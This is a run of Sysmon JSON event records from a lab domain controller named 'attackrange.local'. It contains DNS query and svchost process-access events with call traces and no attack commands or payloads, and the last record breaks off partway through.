{"EventTime":"2020-08-01 07:53:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2648,"ProcessID":2804,"ThreadID":3344,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:53.770\r\nProcessGuid: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nProcessId: 1312\r\nQueryName: win-dc-6178966.attackrange.local\r\nQueryStatus: 9501\r\nQueryResults: type:  6 ;10.0.1.14;\r\nImage: C:\\Windows\\System32\\svchost.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 07:53:53.770","ProcessGuid":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","QueryName":"win-dc-6178966.attackrange.local","QueryStatus":"9501","QueryResults":"type:  6 ;10.0.1.14;","Image":"C:\\Windows\\System32\\svchost.exe","EventReceivedTime":"2020-08-01 07:53:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2649,"ProcessID":2804,"ThreadID":3344,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:53.780\r\nProcessGuid: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nProcessId: 1312\r\nQueryName: attackrange.local\r\nQueryStatus: 0\r\nQueryResults: type:  2 win-dc-6178966.attackrange.local;10.0.1.14;\r\nImage: C:\\Windows\\System32\\svchost.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 07:53:53.780","ProcessGuid":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","QueryName":"attackrange.local","QueryStatus":"0","QueryResults":"type:  2 win-dc-6178966.attackrange.local;10.0.1.14;","Image":"C:\\Windows\\System32\\svchost.exe","EventReceivedTime":"2020-08-01 07:53:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:56","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2650,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:56.672\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:56.672","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:56","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2651,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:56.672\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:56.672","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:56","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2652,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:56.672\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:56.672","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:56","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2653,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:56.672\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:56.672","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:56","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2654,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:56.672\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:56.672","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:56","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2655,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:56.672\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:56.672","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:56","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2656,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:56.672\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:56.672","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:56","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2657,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:56.672\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 